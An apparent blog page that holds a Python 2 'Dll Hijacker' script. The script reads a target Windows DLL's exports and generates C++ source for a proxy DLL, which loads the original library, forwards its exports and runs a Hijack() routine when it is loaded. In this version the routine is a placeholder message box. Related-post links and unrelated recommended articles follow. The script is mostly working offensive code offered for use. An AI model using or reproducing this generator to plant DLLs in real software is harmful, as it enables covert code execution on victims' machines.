#coding=utf-8

#

# Dll Hijacker

#

# platform: Python 2.x @ Windows

#

# author:Coca1ne

import os,sys,time

import pefile

def main():

    try:

        pe = pefile.PE(sys.argv[1])

        exportTable = pe.DIRECTORY_ENTRY_EXPORT.symbols

        print "[!]Find export function :[ %d ]\r\n" % len(exportTable)

        for exptab in exportTable:

            print "%3s %10s" % (exptab.ordinal, exptab.name)

        print "\r\n[+] generating DLL Hijack cpp file ..."

        generate(exportTable)

        print "\r\n[+] generating DLL Hijack cpp file has finished!"

    except Exception, e:

        print e

def generate(exportTable):

    segments = r"//Generate by DLLHijacker.py\

\

#include <Windows.h>\

\

DEFINE_DLL_EXPORT_FUNC\

#define EXTERNC extern \"C\"\

#define NAKED __declspec(naked)\

#define EXPORT __declspec(dllexport)\

#define ALCPP EXPORT NAKED\

#define ALSTD EXTERNC EXPORT NAKED void __stdcall\

#define ALCFAST EXTERNC EXPORT NAKED void __fastcall\

#define ALCDECL EXTERNC NAKED void __cdecl\

\

namespace DLLHijacker\

{\

    HMODULE m_hModule = NULL;\

    DWORD m_dwReturn[17] = {0};\

    inline BOOL WINAPI Load()\

    {\

        TCHAR tzPath[MAX_PATH];\

        lstrcpy(tzPath, TEXT(\"DLL_FILENAME.dll\"));\

        m_hModule = LoadLibrary(tzPath);\

        if (m_hModule == NULL)\

            return FALSE;\

        return (m_hModule != NULL);\

    }\

    inline VOID WINAPI Free()\

    {\

        if (m_hModule)\

            FreeLibrary(m_hModule);\

    }\

    FARPROC WINAPI GetAddress(PCSTR pszProcName)\

    {\

        FARPROC fpAddress;\

        CHAR szProcName[16];\

        fpAddress = GetProcAddress(m_hModule, pszProcName);\

        if (fpAddress == NULL)\

        {\

            if (HIWORD(pszProcName) == 0)\

            {\

                wsprintf(szProcName, \"%d\", pszProcName);\

                pszProcName = szProcName;\

            }\

            ExitProcess(-2);\

        }\

        return fpAddress;\

    }\

}\

using namespace DLLHijacker;\

VOID Hijack()\

{\

    MessageBoxW(NULL, L\"DLL Hijack! by DLLHijacker\", L\":)\", 0);\

}\

BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)\

{\

    if (dwReason == DLL_PROCESS_ATTACH)\

    {\

        DisableThreadLibraryCalls(hModule);\

        if(Load())\

            Hijack();\

    }\

    else if (dwReason == DLL_PROCESS_DETACH)\

    {\

        Free();\

    }\

    return TRUE;\

}\

"

    filename = sys.argv[1][sys.argv[1].rindex('\\')+1:sys.argv[1].rindex('.')]

    fp = open(filename + ".cpp", "w+")

    define_dll_exp_func = ""

    for exptable in exportTable:

        define_dll_exp_func += r"#pragma comment(linker, \"/EXPORT:" + str(exptable.name) +\

                            "=_DLLHijacker_" + str(exptable.name) + ",@"+ str(exptable.ordinal) +"\")\n"

    segments = segments.replace('DLL_FILENAME', filename)

    segments = segments.replace("DEFINE_DLL_EXPORT_FUNC", define_dll_exp_func).replace('\\','')

    fp.writelines(segments)

    forward_dll_exp_func = ""

    for exptable in exportTable:

        forward_dll_exp_func += "ALCDECL DLLHijacker_"+ str(exptable.name) +"(void)\n{" + \

                            "\n        __asm POP m_dwReturn[0 * TYPE long];\n    GetAddress(\""+ \

                            str(exptable.name) + "\")();\n    __asm JMP m_dwReturn[0 * TYPE long];\n}\r\n"

    fp.writelines(forward_dll_exp_func)

    fp.close()

def usage():

    print "Usage:"

    print "    %s c:\\windows\\system32\\msimg32.dll" % sys.argv[0]

if __name__ == "__main__":

    if(len(sys.argv) <2):

        usage()

    else:

        main()

Dll Hijacker的更多相关文章

  1. 使用powershell提权的一些技巧

    原文:http://fuzzysecurity.com/tutorials/16.html 翻译:http://www.myexception.cn/windows/1752546.html http ...

  2. metasploit--exploit模块信息

    Name                                             Disclosure Date  Rank    Description ----           ...

  3. Kali linux 2016.2(Rolling)中的Exploits模块详解

    简单来将,这个Exploits模块,就是针对不同的已知漏洞的利用程序. root@kali:~# msfconsole Unable to handle kernel NULL pointer der ...

  4. dll文件32位64位检测工具以及Windows文件夹SysWow64的坑

    自从操作系统升级到64位以后,就要不断的需要面对32位.64位的问题.相信有很多人并不是很清楚32位程序与64位程序的区别,以及Program Files (x86),Program Files的区别 ...

  5. C#创建dll类库

    类库让我们的代码可复用,我们只需要在类库中声明变量一次,就能在接下来的过程中无数次地使用,而无需在每次使用前都要声明它.这样一来,就节省了我们的内存空间.而想要在类库添加什么类,还需取决于类库要实现哪 ...

  6. 关于Linux和Windows下部署mysql.data.dll的注册问题

    mysql ado.net connector下载地址: http://dev.mysql.com/downloads/connector/net/ 选择版本: Generally Available ...

  7. Windows平台Go调用DLL的坑

    最近的项目中,使用了GO来开发一些服务中转程序.业务比较简单,但是有一些业务需要复用原有C++开发的代码.而在WINDOWS,用CGO方式来集成C/C++代码并不是太方便.所以用DLL把C++的代码封 ...

  8. C#开发奇技淫巧三:把dll放在不同的目录让你的程序更整洁

    系列文章 C#开发奇技淫巧一:调试windows系统服务 C#开发奇技淫巧二:根据dll文件加载C++或者Delphi插件 C#开发奇技淫巧三:把dll放在不同的目录让你的程序更整洁 程序目录的整理 ...

  9. .Net使用Newtonsoft.Json.dll(JSON.NET)对象序列化成json、反序列化json示例教程

    JSON作为一种轻量级的数据交换格式,简单灵活,被很多系统用来数据交互,作为一名.NET开发人员,JSON.NET无疑是最好的序列化框架,支持XML和JSON序列化,高性能,免费开源,支持LINQ查询 ...

随机推荐

  1. ISO C++标准委员会不是一个一般意义上权力机构,基本上愿意交会费,愿意自己出时间,出酒店机票,出提案,就可以申请加入。

    ISO C++标准委员会不是一个一般意义上权力机构,基本上愿意交会费,愿意自己出时间,出酒店机票,出提案,每年全世界参加会议被专家巨细靡遗地评头论足,就可以申请加入. 所以参加标准委员会背景各异,有人 ...

  2. PHP & “Data” URL scheme(转)

    基本上所有的对文件操作的API, 都迁移到的了PHP stream上, 所以, 绝大部分对文件操作的API都是支持Data URL的. 当某个API需要操作对象是文件的时候, 我们其实是可以采用Dat ...

  3. CentOS7安装MySQL 5.7

    1.源码包下载 wget https://dev.mysql.com/get/Downloads/MySQL-5.7/mysql-boost-5.7.20.tar.gz 2.编译安装 安装依赖包: y ...

  4. BBS项目部署

    1.准备 项目架构为:LNM+Python+Django+uwsgi+Redis   (L:linux,N:nginx,M:mysql) 将bbs项目压缩上传到:  /opt 在shell中直接拖拽 ...

  5. MySql库、表权限管理

    #授权表user #该表放行的权限,针对:所有数据,所有库下所有表,以及表下的所有字段db #该表放行的权限,针对:某一数据库,该数据库下的所有表,以及表下的所有字段tables_priv #该表放行 ...

  6. [转发]SPRING MVC3.2案例讲解--SPRING MVC3的@ResponseBody和ResponseEntity

    在传统的开发过程中,我们的控制CONTROLL层通常需要转向一个JSP视图:但随着WEB2.0相关技术的崛起,我们很多时候只需要返回数据即可,而不是一个JSP页面. SPRING MVC3的@Resp ...

  7. HTML5开源RPG游戏引擎lufylegendRPG 0.1发布

    一,小小开篇   首先不得不先介绍一下这个引擎: lufylegendRPG是lufylegend的拓展引擎,使用它时,需要引入lufylegend.同时您也需要了解lufylegend语法,这样才能 ...

  8. python logging模块介绍

    1.日志级别 日志一共分成5个等级,从低到高分别是:DEBUG INFO WARNING ERROR CRITICAL. DEBUG:详细的信息,通常只出现在诊断问题上 INFO:确认一切按预期运行 ...

  9. Spring第八发—自动装配及让Spring自动扫描和管理Bean

    依赖注入–自动装配依赖对象(了解即可) 对于自动装配,大家了解一下就可以了,实在不推荐大家使用.例子: byName:按名称装配,可以根据属性的名称,在容器中寻找跟该属性名相同的bean,如果没有找到 ...

  10. 20165324《Java程序设计》第一周

    20165324<Java程序设计>第一周学习总结 教材学习内容总结 第一章:Java入门 重点一.编写Java程序 第一步编写源文件,(注:第一步中Java严格区分大小写:Java源文件 ...